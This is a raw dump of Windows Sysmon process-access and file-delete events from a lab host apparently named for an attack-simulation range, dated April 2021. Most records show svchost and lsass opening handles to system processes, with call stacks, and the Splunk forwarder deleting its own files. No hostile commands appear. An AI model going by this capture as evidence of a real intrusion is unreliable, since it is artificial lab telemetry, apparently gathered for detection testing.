12:24:42.407{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291891Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.407{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291890Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.407{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291889Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.392{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291888Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.392{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291887Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.376{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A138770055C55FC3A0240CAC43309BA9,SHA256=10E2BCD113F6918570370E674B798082DBABAF63E2CF0C2D0886236B84ABDA04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291886Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.376{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=A6AD4A5DE231D92AA1532A66FBBFE959,SHA256=6827B051C5AA65E35D5D9138D83B3BCBAF48A59B67BFB6EABEFADCD73E6CE0EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291885Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.376{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=1AE76CE69394D3AD52D66AE36DFBA1AA,SHA256=1D8768D29465A0D0E60DE88215B1ACC92347B1EE343C2E370815185332F778B1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291884Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.361{BEA10069-D0C2-6086-1000-00000000BB01}9445440C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291883Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.339{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291882Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.339{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291881Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.339{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291880Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.339{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291879Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.339{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291878Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.339{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291877Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.339{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-028A-6088-072A-00000000BB01}1504C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291876Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.339{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-028A-6088-072A-00000000BB01}1504C:\Windows\system32\dwm.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291875Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.323{BEA10069-D0C1-6086-0500-00000000BB01}416952C:\Windows\system32\csrss.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291874Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.323{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291873Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.307{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291872Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.307{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291871Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.307{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291870Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.307{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291869Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.307{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291868Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.292{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291867Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.292{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291866Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.292{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KER